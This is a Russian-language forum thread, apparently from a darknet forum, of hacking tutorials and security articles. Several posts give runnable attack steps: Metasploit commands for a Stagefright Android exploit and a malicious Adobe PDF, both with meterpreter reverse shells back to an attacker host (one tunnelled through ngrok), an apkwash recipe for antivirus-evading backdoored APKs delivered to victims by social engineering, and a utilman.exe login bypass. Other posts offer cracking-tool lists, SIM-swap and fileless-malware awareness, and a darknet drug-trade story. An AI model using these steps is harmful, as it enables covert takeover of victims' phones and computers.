Ваш телефон может рассказать о вас гораздо больше, чем вы думаете. И если ваша личная информация попадет в руки третьих лиц, то это может иметь катастрофические последствия. Злоумышленники придумывают все новые способы мониторинга мобильных устройств, и зачастую они используют уязвимости в операционной системе.
Сегодня мы покажем вам на примере одной такой уязвимости, как хакеры взламывают андроид. Суть этого метода проста: жертва открывает вредоносную ссылку, и её телефон автоматически взламывается. Не верите? Тогда читайте до конца.
https://i.gyazo.com/0a5f835f883e8a7c3d859d3b36ced590.jpg
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Как работает взлом
Эксплойт Stagefright - это критическая уязвимость в Android, которая была обнаружена исследователем кибербезопасности из Zimperium. Эта уязвимость представляет собой тип атаки переполнения буфера. Плюсом эксполойта является его удаленность. Хакер отправляет вредоносную ссылку на файл, при нажатии на которую происходит сбой библиотеки stagefright, а затем процесс перезапускается обратно на сервер, и устройство взламывается, а пользователь даже не догадывается об этом.
А теперь давайте на практике посмотрим, как это все дело работает.
Взлом Android ссылкой
Шаг 1: Загрузите Kali Linux.
Запустите свой компьютер с Kali Linux и откройте Metasploit.
Шаг 2: Настройте Metasploit для использования эксплойта Stagefright.
Чтобы настроить Metasploit, введите команды в консоли msf:
use exploit/android/browser/stagefright_mp4_tx3g_64bit
Затем введите следующее: set SRVHOST 192.168.182.136 (здесь ваш IP)
Теперь введите: set URIPATH /
Вам нужно установить полезную нагрузку для этого типа с помощью следующей команды: set payload linux/armle/meterpreter/reverse_tcp
Установите свой IP-адрес: set lhost 192.168.182.136 (здесь ваш IP)
Введите эту команду для подробного режима: set verbose true exploit -j
Шаг 3: Отправьте вредоносную ссылку жертве.
В нашем случае ссылка получилась такой: http://192.168.182.136:8080/
Как только жертва нажмет на ссылку, ее телефон будет взломан. И вы сможете управлять им удаленно с помощью эксплойта stagefright.
Советы по безопасности
Вот несколько советов, которые вы можете использовать для предотвращения взлома телефона:
Не открывайте ссылки, отправленные в текстовых сообщениях и электронных письмах, без проверки источника;
Устанавливайте приложения только из официального магазина игр. Не открывайте неизвестные ссылки и файлы, которым вы не доверяете;
Не подключайте телефон к общедоступной сети Wi-Fi без использования VPN;
Регулярно обновляйте ваше устройство. Данная уязвимость уже исправлена разработчиками, поэтому проверьте ваше устройство на наличие последних обновлений;
Установите хороший антивирус на свое устройство Android.
BlackMAST
18.08.2023, 10:41
https://i.gyazo.com/356eede9661b39d11d57acbd3aaab97d.jpg
Вступить в наш чатАнтивирусы — чрезвычайно полезные инструменты — но не в тех ситуациях, когда вам нужно оставаться незамеченным в атакуемой сети. Обход антивируса на андроиде — одна из самых сложных задач. Ну, по крайней мере, так было раньше, пока у нас не появились такие инструменты, как Apk Bleach и Apk Wash, которые могут скрыть вредоносные приложения от обнаружения антивирусами. Сегодня мы покажем, как хакеры обходят антивирусную защиту на андроиде, избежав обнаружения во время взлома и тестирования на проникновение.
https://i.gyazo.com/5e3f3250d9a8b8ff9cf5f8354d96d83f.jpg
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Возможности инструмента
Stealth option — этот параметр позволяет вам определить количество сеансов эксплойта, которые будут созданы.
Icon injection— с помощью этой опции выберите значок, который вы хотите отобразить на устройстве жертвы. Вы также можете создать свою собственную иконку.
Application renaming—придумайте название вашему приложению.
Signing the apk— подпишите apk. Поскольку msfvenom создает неподписанные приложения для Android, иструмент использует jar signer для подписи сгенерированных полезных нагрузок.
Apk Wash также позволяет построчно редактировать разрешения. Инструмент просматривает каждое из разрешений и запрашивает разрешение на их удаление или сохранение.
Установка инструмента
Шаг 1: Загрузите Apk Wash и клонируйте его в Kali Linux с помощью следующей команды:
git clone https://github.com/jbreed/apkwash.git Шаг 2: Предоставьте разрешения инструменту с помощью следующей команды, как показано ниже:
****d +x apkwash mv apkwash /usr/local/bin/. Шаг 3: Теперь мы можем использовать следующую команду для создания вредоносного файла:
Ниже приведены параметры, которые вы можете использовать, чтобы создать вредоносные файлы:
-p | –payload Устанавливает полезную нагрузку, которая будет сгенерирована msfvenom.
-о | –output Задает имя созданного APK, а также файл apk.
-х | –original APK для внедрения полезной нагрузки.
-g | –generate Генерирует полезную нагрузку, используя значения по умолчанию.
-n | –newkey Генерирует новый ключ отладки перед подписью.
-v | – verbose Показывает вывод команд.
-d | – d***g Оставляет файлы /tmp/payload на месте для просмотра.
-h | – help Справочная информация.
apkwash -p android/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=1337 -o update.apk Шаг 4: Теперь у вас есть вредоносный apk-файл, который нельзя обнаружить антивирусом. Существует всего несколько антивирусов, которые могут помечать этот файл как вирус, но это случается очень редко.
Теперь отправьте ваше приложение жертве, используя методы социальной инженерии. Убедитесь, что жертва загрузит и установит приложение на свой андроид, после чего вы сможете удаленно отправлять команды на ее устройство. Стоит отметить, что установка проходит гладко, без каких-либо подозрительных уведомлений от Google Play Protect.
Заключение
Наверняка вы сталкивались с ситуациями, когда доступ к атакуемой сети получен и от заветной цели вас отделяет всего один маленький шаг, а антивирус не позволяет вам сделать этот шаг (например, не дает запустить нужную программу). Во многих случаях у вас есть только одна попытка — и она терпит неудачу из-за тревоги, поднятой антивирусом. Иногда антивирусы удаляют абсолютно безобидные файлы, а не только исполняемые. В результате скрыть реальную угрозу становится крайне сложно. В этой ситуации на помощь приходит Apk Wash, который не даст антивирусу себя обнаружить. Сегодня вы не только узнали о существовании такого нужного инструмента, но и научились использовать его на практике. На этом все. Удачи!
BlackMAST
21.08.2023, 10:19
Взлом ОС Windows с помощью Adobe PDF
https://i.gyazo.com/17453a67d7d9ab2a44a16bbdea567bc4.jpg
Вступить в наш чат
В этой статье мы узнаем, как хакеры взламывают Windows 10 с помощью эксплойта Adobe PDF. Мы будем использовать инструмент Ngrok для переадресации портов, который доступен для Linux, Windows и macOS. Ngrok помогает осуществить взлом через Интернет и атаковать за пределами локальной сети.
https://i.gyazo.com/993feac270fada6188a566ecfb9a0f8e.jpg
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Взлом Windows с помощью Adobe PDF
Требования:
Установленный Kali Linux и Ngrok;
Цель должна иметь Adobe Reader версии 8 или 9.
Этапы взлома Windows:
1. Создание вредоносного PDF-файла с помощью Metasploit;
2. Переадресация портов с помощью Ngrok, чтобы взлом работал через Интернет;
3. Запуск прослушивателя для вредоносной полезной нагрузки с помощью Msfconsole.
1. Создание вредоносной полезной нагрузки с использованием Metasploit Framework
Шаг 1: Откройте терминал Kali Linux и введите следующую команду, чтобы запустить Metasploit:
msfconsole
Шаг 2: Существует множество эксплойтов Windows. В этом мануале мы будем использовать эксплойт Adobe pdf. Вы же можете выбрать любой другой эксплойт.
Введите следующую команду, чтобы использовать эксплойт Adobe PDF:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Шаг 3: Теперь, когда мы выбрали эксплойт, нам нужно указать полезную нагрузку для внедрения во вредоносный файл Adobe PDF. Для этого введите следующую команду:
set payload windows/meterpreter/reverse_tcp
2. Переадресация портов с помощью Ngrok
Шаг 4: Теперь нам нужно запустить службу Ngrok, чтобы мы могли использовать переадресацию портов на нашей машине. Чтобы запустить службу ngrok, введите следующую команду:
./ngrok tcp 1234
Шаг 5: После того, как вы запустили службу Ngrok, вы увидите следующее:
Адрес перед двоеточием (
https://darkmoney.sx/images/smilies/smile.gif
— это ваш LHOST, а после двоеточия — LPORT: см. изображение ниже:
https://i.gyazo.com/a252e859ee2fe6423558636cae0ef11e.jpg
Примечание: ваши LHOST и LPORT будут отличаться от тех, что видите на скриншоте. Замените их на LHOST и LPORT.
Если вы хотите использовать взлом в локальной сети, то замените LHOST и LPORT на свой собственный локальный IP-адрес. Вы можете узнать его с помощью команды ifconfig.
Шаг 6: Теперь, чтобы настроить LHOST, введите следующую команду:
set LHOST 0.tcp.ngrok.io
Шаг 7: Чтобы настроить LPORT, введите следующую команду:
set LPORT 13288
Шаг 8: Установите имя файла:
set FILENAME test.pdf
Шаг 9:Введите следующее, чтобы запустить эксплойт и создать вредоносный pdf-файл:
exploit
Таким образом, Metasploit создал файл Adobe PDF с именем test.pdf. Metasploit по умолчанию поместит файл в /root/.msf4/local/test.pdf. Проверьте этот каталог на наличие вредоносного PDF-файла. После чего вам нужно будет отправить этот PDF-файл жертве, используя приемы социальной инженерии.
3. Создание прослушивателя для вредоносной полезной нагрузки PDF
Чтобы создать прослушиватель для нашего вредоносного эксплойта Adobe pdf, нам нужно ввести следующие команды по порядку:
Шаг 1: Откройте Metasploit в новом терминале Kali Linux:
msfconsole
Шаг 2: Выполните следующие команды в том же порядке, как показано ниже:
use multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 127.0.0.1 set LPORT 1234 exploit Итак, как только жертва откроет вредоносный PDF-файл, будет установлено соединение Meterpreter через прослушиватель Metasploit. Далее вы сможете выполнять все остальные действия. Просто введите help, чтобы увидеть список всех возможных взломов.
Поздравляем, вы успешно взломали Windows с помощью вредоносного pdf-файла.
BlackMAST
28.08.2023, 18:43
Взлом Windows: как хакеры обходят систему безопасности
https://i.gyazo.com/8cd725e7a01e78f769f0ba6a18c13329.jpg
Вступить в наш чат
В современную цифровую эпоху тяжело представить жизнь без компьютера. ПК защищают наши личные данные, полагаясь на пароли и различные протоколы безопасности. Так, например, пароль при входе в Windows защищает от стороннего проникновения и доступа к информации. Тем не менее, как и в любой системе, существуют уязвимости, которыми могут воспользоваться опытные хакеры.
В этой статье мы погрузимся в тему кибербезопасности, чтобы раскрыть секрет обхода пароля Windows и изучить меры предосторожности, которые каждый из нас может предпринять.
https://i.gyazo.com/3218de0c834d0a8d9e7d15c7e3ae404a.jpg
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
При включении и перезагрузке компьютера операционная система запросит у вас имя пользователя и пароль, и только после успешной аутентификации вы получите доступ к ресурсам системы. Этот двухэтапный процесс направлен на защиту ваших данных, чтобы избежать несанкционированного доступа.
https://i.gyazo.com/08dba176999b09826cab3fc6fbed5329.jpgМетоды обхода пароля Windows
Атака методом перебора: хакеры используют автоматизированные инструменты, чтобы точно подобрать пароль с помощью разных комбинаций. За короткий промежуток времени хакеры могут легко взломать слабые пароли, тем самым подвергая риску безопасность вашей системы.
Кейлоггер: вредоносное программное обеспечение записывает ваши нажатия клавиш, эффективно перехватывая учетные данные для входа в систему по мере их ввода. Впоследствии злоумышленники могут использовать украденные данные для получения несанкционированного доступа.
Кража учетных данных: с помощью уязвимостей в программном обеспечении или фишинга хакеры могут обманом заставить пользователей раскрыть свои учетные данные. Этот метод основан на социальной инженерии, что делает его не менее эффективным.
Уязвимости Windows: операционные системы могут иметь уязвимости, которые позволяют хакерам получать несанкционированный доступ, используя слабые места в коде. Регулярные обновления программного обеспечения помогают своевременно устранять уязвимости.
Одним из самых распространенных и простых способов взлома Windows является использование кнопки «Специальные возможности».
Взлом с помощью «Специальных возможностей»
https://i.gyazo.com/5926ae6e626180e9e77d532abee993ae.jpgКнопка «Специальных возможностей» на экране входа в Windows предназначена для пользователей с ограниченными возможностями, и имеет такие инструменты, как диктор, лупа и экранная клавиатура. Однако коварные хакеры нашли способ превратить эту полезную функцию в способ взломать Windows.
Основная идея этого эксплойта — заменить кнопку «Специальных возможностей» командной строкой, которая предоставляет доступ к интерфейсу командной строки системы. Отсюда хакер может выполнять различные команды для манипулирования системой, включая изменение паролей, создание новых учетных записей и многое другое.
Ниже представлено пошаговое руководство того, как осуществляется этот эксплойт:
Доступ к экрану входа в систему. Злоумышленнику необходим физический или удаленный доступ к экрану входа в систему целевого компьютера.
Запуск эксплойта. На экране входа в систему злоумышленник нажимает кнопку «Специальных возможностей», которая располагается в правом нижнем углу.
Замена Utilman.exe. Далее хакер заменяет приложение диспетчера утилит (utilman.exe) на cmd.exe (командная строка), переименовывая файлы. Это можно сделать с помощью внешнего загрузочного носителя или другими способами, если злоумышленник уже имеет доступ к системе.
https://i.gyazo.com/453291cc46cb5b11e6dadb7c93a09431.jpg
Выполнение команд. После нажатия кнопки вместо запуска инструментов специальных возможностей запускается командная строка с правами администратора.
Манипулирование системой. Из командной строки злоумышленник может использовать команды для создания новых учетных записей пользователей, изменения паролей или получения доступа к конфиденциальным файлам и настройкам.
Защита от взлома Windows
Используйте надежные пароли. Создавайте сложные пароли, состоящие из прописных и строчных букв, цифр и специальных символов. Избегайте использования личной информации в пароле, такой как даты рождения или клички животного.
Включите двухфакторную аутентификацию (2FA). Двухфакторная аутентификация добавляет дополнительный уровень безопасности, требуя второго этапа проверки, часто через мобильное приложение или электронную почту, помимо вашего пароля.
Регулярные обновления. Обновляйте свою операционную систему и все программные обеспечения. Обновления часто включают исправления уязвимостей, что снижает риск взлома.
Остерегайтесь фишинга. Будьте осторожны, нажимая на подозрительные ссылки или предоставляя данные для входа на незнакомых веб-сайтах. Хакеры часто используют тактику фишинга для кражи учетных данных.
Антивирус от вредоносных программ. Установите надежное антивирусное программное обеспечение, чтобы обнаружить и предотвратить заражение вашей системы вредоносным ПО.
Брандмауэр. Используйте брандмауэр для мониторинга и контроля входящего и исходящего сетевого трафика, что может помочь предотвратить стороннее проникновение.
BlackMAST
31.08.2023, 11:44
Лучшие инструменты для взлома всех времен
https://i.gyazo.com/d0f49ca6fdc6d3ce8875b088d8195099.jpg
Вступить в наш чатС ростом киберпреступности появляются все новые инструменты для взлома. В игру вступают новые механизмы защиты или нападения, которые не всегда являются лучшей заменой старым и проверенным инструментам. Поэтому оставаться в курсе лучших инструментов кибербезопасности – непростая задача. Тем не менее, мы составили для вас подборку Топ-10 инструментов для взлома всех времен.
https://i.gyazo.com/350e26d39330bacd6bace74688f67f8a.jpg
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Brutus
В октябре 2000 года был выпущен Brutus, один из наиболее широко используемых онлайн-инструментов для взлома паролей. Разработчик утверждает, что Brutus является самым быстрым и гибким инструментом для взлома паролей из всех доступных на рынке.
Brutus — бесплатный инструмент, доступный только для клиентов Windows. Он поддерживает ряд аутентификаций, таких как HTTP, Telnet, Pop3, IMAP и т. д. Кроме того, он содержит дополнительные функции, позволяющие пользователям создавать свой собственный тип аутентификации. Несмотря на то, что Brutus давно не обновлялся, он до сих пор остается одним из самых полезных инструментов для взлома паролей.
RainbowCrack
RainbowCrack — это инструмент, который взламывает хэши с использованием радужных таблиц. RainbowCrack поражает своей скоростью, поскольку он взламывает пароли быстрее, чем традиционные инструменты брутфорса.
Разработчики RainbowCrack также успешно создали радужные таблицы MD5, Sha1, NTLM и радужные таблицы LM, которые можно скачать бесплатно и использовать в процессе взлома паролей. Инструмент работает на платформах Windows и Linux и поддерживает вычисления на многоядерных процессорах.
Wfuzz
Wfuzz — это инструмент для взлома паролей, который использует методы грубой силы. Также его можно использовать для обнаружения скрытых ресурсов (каталоги, сценарии и сервлеты). Wfuzz способен обнаруживать различные внедрения, такие как LDAP, SQL и т. д., внутри целевого приложения с возможностью создания инъекций из нескольких точек одновременно. Это бесплатное программное обеспечение, доступное для Windows, macOS и Linux.
Cain & Abel
Cain & Abel — популярный инструмент для взлома паролей, который использует слабые места в системе безопасности. Он работает с сетевыми анализаторами для взлома зашифрованных паролей с помощью атаки по словарю. Cain & Abel будет полезен не только для хакеров, но и для специалистов по сетевой безопасности и тестировщиков.
John the Ripper
John the Ripper — очень известный инструмент для взлома паролей с открытым исходным кодом, доступный для всех платформ, таких как Linux, macOS, Unix, Windows и т. д. Джон потрошитель может легко взломать пароли. Помимо этого, он имеет настраиваемый взломщик с возможностью автоматического определения типов хэшей паролей. У Джона Потрошителя также есть профессиональная версия, которая включает в себя расширенные функции для более быстрого и точного взлома паролей.
THC-*****
THC-***** — это инструмент для быстрого взлома паролей, который поддерживает множество сервисов. Это один из лучших инструментов для удаленного взлома с помощью перебора, поскольку он использует эффективные атаки по словарю против более чем 30 протоколов, включая FTP, HTTPS, Telnet, SMB и многие другие. ***** доступен для ряда платформ, включая Solaris, Windows, Linux и т. д..
Medusa
Medusa — еще один популярный инструмент для взлома паролей на основе командной строки. Он поддерживает MS SQL, MYSQL, HTTP, FTP, CVS, SMTP, SNMP, SSH и многие другие протоколы. У Medusa есть отличная возможность выполнять параллельные атаки одновременно на разные системы, это означает, что вы можете взломать несколько приложений одновременно, просто предоставив подробную информацию о целях. Medusa — один из лучших инструментов для взлома паролей всех времен.
OPHCrack
OPHCrack — это инструмент с открытым исходным кодом на основе радужных таблиц для взлома паролей, который является самым популярным средством взлома паролей для устройств под управлением Windows. Он может легко взломать хэши NTLM и LM, а также предоставляет графики в реальном времени для анализа паролей. Одна из его удивительных возможностей заключается в том, что он может импортировать хеши из различных форматов, включая дамп непосредственно из SAM-файлов Windows. OPHCrack также предоставляет на своей платформе Live CD и бесплатные радужные таблицы, чтобы еще больше упростить процесс взлома паролей.
L0phtCrack
L0phtCrack взламывает пароли Windows, ориентируясь на хэши, что делает его лучшей заменой OPHCrack. Он использует основные контроллеры домена, рабочие станции (Windows), сетевые серверы, а также атаку методом перебора и атаки по словарю для получения паролей.
Aircrack-NG
Aircrack-NG — лучший инструмент для взлома паролей сетей WEP и WPA. Это инструмент командной строки, который может работать на всех платформах, таких как Windows, Linux и т.д.. Механизм атаки, используемый этим инструментом, довольно прост. Все, что он делает, это отслеживает и собирает пакеты, и как только будет перехвачено достаточное количество пакетов, он пытается восстановить пароль, что делает атаку намного быстрее по сравнению с другими инструментами взлома WEP.
Заключение
Вышеупомянутые инструменты являются лучшими, когда дело доходит до взлома паролей. Но также они указывают на очень важный аспект: любой пароль в этом мире можно взломать, если у злоумышленника есть соответствующие инструменты для выполнения задачи. Итак, все, что мы можем сделать, это убедиться, что наши пароли являются достаточно надежными, чтобы противостоять любым возможным атакам с помощью этих инструментов.
Keith05j
11.09.2023, 23:35
haniaamir whoash hawasabiw
BlackMAST
18.09.2023, 12:37
Скам с заменой SIM-карты: что это такое и как защитить себя
https://i.gyazo.com/f0baee5f0ac46d23ab5a70f150c2a78c.jpg
Вступить в наш чат
Все привыкли думать, что злоумышленники могут украсть деньги с банковской карты, только если сообщить им код с обратной стороны карточки. И действительно, большая часть мошенничеств совершается именно так. Однако сейчас существуют и более изощренные способы, для которых секретные данные не нужны. В этой статье мы прольем свет на **** с заменой симки, а главное поделимся советами, которые помогут обезопасить себя.
https://i.gyazo.com/ce61c790d41515ddd2574aab7dc8faee.jpgЧто такое **** с заменой SIM-карты
Скам с заменой SIM-карты предполагает тщательно организованный акт мошенничества, в котором киберпреступники берут под контроль ваш номер телефона, чтобы получить доступ к вашим звонкам, текстовым сообщениям и, что самое страшное, к вашим кодам двухфакторной аутентификации (2FA).
Чтобы понять, как разворачивается мошенничество с заменой SIM-карты, важно разобрать его поэтапно:
Сбор информации. Киберпреступники начинают свою атаку с тщательного сбора вашей личной информации. Эта сокровищница часто включает в себя данные, полученные из ваших профилей в социальных сетях, утечек данных или попыток фишинга. Вооружившись знаниями о вашем ФИО, дате рождения, номере телефона, они переходят к следующему этапу.
Общение с оператором мобильной связи. Имея ваши данные, мошенники хитро выдают себя за вас. Они инициируют контакт с вашим оператором мобильной связи, утверждая, что потеряли свой телефон или SIM-карту. В некоторых случаях они могут даже выдать себя за представителя службы поддержки вашего банка для большей правдоподобности.
Замена SIM-карты. Если обман увенчается успехом, оператор связи быстро активирует новую SIM-карту с вашим номером телефона, а затем деактивирует существующую. Этот поворотный момент наступает, когда вы теряете доступ к своему телефону, а злоумышленники захватывают контроль над вашей цифровой личностью.
Захват учетной записи. Получив контроль над вашим номером телефона, злоумышленники могут сбросить вашу электронную почту и банковские пароли. Из наиболее частых последствий следует ожидать несанкционированные финансовые операции и кражу личных данных.
https://i.gyazo.com/57471c2b7c4e70d43cfb4d388cfa352b.jpgЗащита вашей цифровой личности
Теперь, когда мы раскрыли зловещие механизмы мошенничества с заменой SIM-карт, пришло время вооружиться знаниями и средствами защиты, необходимыми для предотвращения этих нежелательных атак.
Выключение 2FA на основе SMS: хотя двухфакторная аутентификация на основе SMS удобна, она не надежна. Рассмотрите возможность перехода на более безопасные методы аутентификации, такие как биометрия.
Мониторинг учетных записей: регулярно проверяйте свои финансовые учетные записи на предмет необычной активности. Раннее обнаружение может предотвратить негативные последствия скама с заменой SIM-карты.
Будьте осторожны в Интернете: ограничьте личную информацию, которой вы делитесь в социальных сетях. Киберпреступники часто используют ее, чтобы выдать себя за вас.
Установите код-пароль. Свяжитесь со своим оператором мобильной связи и установите уникальный персональный идентификационный номер (PIN-код) или код-пароль для своей учетной записи. Требуйте этот код в качестве обязательного этапа проверки, прежде чем можно будет внести какие-либо изменения.
Используйте код восстановления электронной почты. Вместо того, чтобы полагаться на SMS для сброса пароля, установите код восстановления электронной почты. Это обеспечивает дополнительный уровень безопасности.
Цифровая безопасность в ваших руках
Пока мы плывем по коварные водам нашей цифровой эпохи, крайне важно оставаться на шаг впереди киберпреступников, которые неустанно разрабатывают новые тактики. Более того, мошенничество с заменой SIM-карт — лишь одно из проявлений продолжающейся борьбы за безопасность и конфиденциальность. Приняв контрмеры, изложенные в этой статье, вы можете значительно снизить возможность стать жертвой мошенничества. Помните, что знания — ваше самое мощное оружие в продолжающейся борьбе с киберугрозами. Будьте в курсе, сохраняйте бдительность и поделитесь этой статьей с другими, чтобы создать более безопасную цифровую среду для всех нас.
BlackMAST
21.09.2023, 11:35
Бесфайловое вредоносное ПО: защита от невидимых угроз
https://i.gyazo.com/720d52d840ebe56538aacc4d0c4543b7.jpg
Вступить в наш чат
С каждым годом киберпреступники совершенствуют свои способы атак, стараясь делать вирусы менее заметными. И такие угрозы уже существуют в виде "бесфайловых" вирусов. И беспокоиться есть о чём, поскольку вредоносное программное обеспечение способно месяцами "сидеть" в ваших компьютерах, не давая о себе знать, а после чего нанести колоссальный ущерб. Что же представляет из себя этот вирус и как от него можно защититься?
https://i.gyazo.com/4719e2bb04b931cd012341eefa545c14.jpg
Что такое бесфайловое вредоносное ПО
Обычно вредоносные программы внедряют в компьютер несколько файлов, которые содержат саму повреждающую компьютер программу, которая копирует какие-то важные для вас данные и перемещает их во внешнее хранилище. Антивирусы умеют успешно бороться с такими программами по их остаточным следам, это своеобразный почерк программы. Но "бесфайловые" вирусы умеют скрывать свои следы, маскируясь под обычные действия операционной системы. Такой вирус представляет из себя вредоносный код, который разработан таким образом, чтобы не записывать себя на жёсткий диск, а работать полностью из оперативной памяти.
Как же "бесфайловый" вирус попадает в систему? Наиболее вероятны два варианта:
через устаревшие браузеры и плагины (дополнения к возможностям программы);
через заражённые веб-страницы или электронные письма в формате .doc или .txt.
Как вернуть контроль над ПК
В этой ситуации главное действовать быстро, чтобы защитить конфиденциальную информацию. Вот шаги, которые вы можете предпринять, чтобы вернуть контроль над этим невидимым противником:
Изоляция. Первым и наиболее важным шагом будет изолировать свое устройство от сети. Отключение интернета помешает злоумышленнику связаться со своими серверами управления и контроля.
Сканирование и очистка. Для обнаружения и удаления безфайлового вредоносного ПО понадобятся специализированные инструменты. Традиционное антивирусное программное обеспечение не справится с этой задачей, поскольку оно не сможет обнаружить эти скрытые угрозы.
Исправление и обновление. Нужно немедленно исправить уязвимое программное обеспечение, которое было использовано. А для предотвращения подобных атак важно всегда регулярно обновлять ПО.
Изменение паролей. Везде, где только можно постарайтесь изменить свои пароли, чтобы злоумышленник не мог заполучить доступ к вашим учетным записям.
Как предотвратить заражение бесфайловым ПО
Избежать заражения можно простыми правилами информационной безопасности:
своевременное обновление браузера и антивируса. Эта мера сокращает риск попадания вирусов на 85%.
соблюдение предупреждений антивируса о посещаемых страницах. Антивирус никогда не запрещает доступ к безопасной странице. Если предупреждение появилось, то скорее всего на странице размещён зловредный программный код, который запустится автоматически, или сайт уже ранее использовался для совершения атак.
своевременное обновление операционной системы . Компания Microsoft выпускает регулярные патчи (файлы, исправляющие в программах ошибки, либо устанавливающие дополнения) для Windows, также происходит и у разработчиков других операционных систем. Важно понимать, что старая версия ОС более уязвима для злоумышленников и вероятность "подцепить" вирус выше.
удаление электронных писем с вложениями от неизвестных отправителей.
ограничение доступа третьих лиц к вашему компьютеру. Если предоставляете доступ, то убедитесь, что понимаете какие это права.
Заключение
Борьба с киберугрозами продолжается и постоянно меняется. Появляются невидимые вирусы, которые могут нанести удар, когда вы меньше всего этого ждете. Именно поэтому, мы должны оставаться на шаг впереди тех, кто стремится нарушить нашу конфиденциальность. Итак, в следующий раз, когда вы будете нажимать на безобидную ссылку, помните, что невидимая угроза бесфайлового вредоносного ПО реальна. Будьте готовы, ваш путь в области безопасности начинается со знаний о киберугрозах. Надеемся, что эта статья оказалась информативной и поучительной для вас. Удачи!
Keith05j
24.09.2023, 01:27
BlackMAST написал(а):
https://i.imgur.com/vNh2u3o.jpg
Как NFT изменили жизнь Павла Сказкина: путь от наркокурьера до успешного художника
Вступить в наш чат
От даркнета до тюрьмы
Как же Павел Сказкин докатился до такой жизни - в середине 2010-х площадки по продаже наркотиков в даркнете были наиболее востребованы:
"Внезапно появилась крипта, нижний интернет, теневые рынки, даркнет, - вспоминает Павел. - Я стал отовариваться там. В какой-то момент я набрел на объявление, что требуются сотрудники. Закончилось это тем, что я нахожусь тут". Работать он стал администратором в RAMP, продавая запрещенные препараты. О том как все происходило, он рассказывает:
"Товары и услуги прямиком из дьявольского сундука: все, что нельзя купить в обычном магазине, можно достать в даркнете (или можно было, на сегодняшние реалии не могу сказать). Сделки на площадках происходят по схеме: покупатель-гарант(площадка)-продавец. Отправленные покупателем средства поступают не напрямую к продавцу, а к гаранту, который получает комиссию за свои услуги. После подтверждения состоявшейся сделки обеими сторонами, средства отправляются гарантом продавцу".После должности администратора Павел решил попробовать себя в роли наркокурьера, и как результат оказался на зоне. Срок он получил - 6 лет лишения свободы с отбыванием наказания в колонии строгого режима за попытку распространения веществ запрещенных законодательством РФ в особо крупном размере, а именно марихуаны.
В тюремной библиотеке Сказкин изучил Уголовный Кодекс и сам подал прошение о смягчении наказания:
"Затянулось это на 11 месяцев и 5 судебных заседаний. В первых трех инстанциях суды отказывали мне и только после того, когда я дошел до Верховного суда РФ удалось получить положительное решение. Летом 2021 года я первый раз за 4 года и 6 месяцев вышел на свободу, увидел жену, маму и отправился в исправительный центр. Здесь у меня был доступ к гаджетам, и это существенно изменило мою жизнь".
Рисование = спасение
Рисование всегда было главным хобби для Павла. Рисовать он начал еще в детстве, но никогда не мог подумать, что в будущем его талант сыграет ему на руку. Так вышло, что его увлечение стало единственной отдушиной и спасением в тюрьме. Другие заключенные сразу же признали талант художника:
"Навыки рисования пригодились мне в местах лишения свободы, я рисовал на простынях, на досках для нард, делал открытки для других осужденных, рисовал стенгазеты по поручениям сотрудников исправительного учреждения. Ну и для себя я рисунки делал, просто потому что мне нравится. Отправлял детям, потому что подарков я никаких сделать не мог».Очень тяжело Сказкину давался информационный голод, поэтому для того, чтобы быть в курсе всех новостей, он выписывал доступные заключенным журналы. Именно из журналов и газет он узнал о NFT-токенах, так и зародилась идея попробовать себя в новом направлении, ведь многие эксперты заявляли, что будущее цифровых технологий за виртуальными мирами.
NFT
Встреча с Ильей Орловым в одном из телеграмм-каналов о NFT оказалась судьбоносной:
"Найдя русскоязычный чат об NFT, я стал расспрашивать пользователей о токенах, и в одной из бесед отправил в чат фото с колючей проволокой, на что получил массу вопросов. Именно тогда меня и заметил Илья. Попросил рассказать свою историю и показать рисунки. На тот момент я продал несколько своих NFT за 2-5$. Средств для размещения на дорогих и полузакрытых площадках у меня не было. Илья, поверивший в меня и в уникальность моей истории, проявил сумасшедший интерес к тому, что я делаю и взял на себя все финансовые затраты и продвижение моих работ".Он решил, что многих людей покорит история Павла, поэтому основным лейкмотивом его творчества и NFT в том числе выбрал тему заключения. Он решил, что акцент в позиционировании художника с никнеймом papasweeds нужно делать на истории его заключения: «Я жил на Западе, и я понимаю, что они там очень любят Достоевского за всю эту глубину, за боль. Они и Pussy Riot полюбили за то, как их ранила власть. И это для них как театр и шоу, которое продается. Я подумал, ну почему нет? Мы поможем Паше. Мы раскачаем проект».
Так художник под никнеймом papasweed и Илья Орлов всего за пару месяцев продали NFT на сумму более чем на 1 миллион рублей, 30 процентов от которых пошли на благотворительность "Руси сидящей".
NFT-токены Павла Сказкина
Первым NFT стала работа под названием "Hall of Shame" или "Зал стыда", на переднем плане которой мы видим полуобнаженного судью с молотком и пакетом с конфетами, а на заднем плане сидит плачущий ребенок. Продана эта работа была за 1 эфир или 2 881,04USD по нынешнему курсу.
Сам Павел Сказкин метафорично описал данную работу:
"Каждый приговор, произнесенный в зале суда, похож на смертный приговор. Годы вашей жизни мгновенно отнимаются. Я чувствовал себя беспомощным, уязвимым ребенком. Стыд, который я чувствовал перед женой и детьми, убивал меня. Я все смотрел на ее слезы и с трудом удерживался от слез, но на самом деле это могли быть слезы радости. Я повторяю себе: "Слава богу, прошло не десять лет", как будто это была проклятая мантра. Российская тюрьма - ужасное исправительное учреждение, призванное стыдить и ломать людей. Я пять лет изучал их учебную программу и скоро закончу".Вторая работа с названием "Испорченное" не менее поражает своей картинкой и душераздирающем описанием.
https://i.gyazo.com/f0fffbbf66c519421a9fba4000dcbcc7.jpg
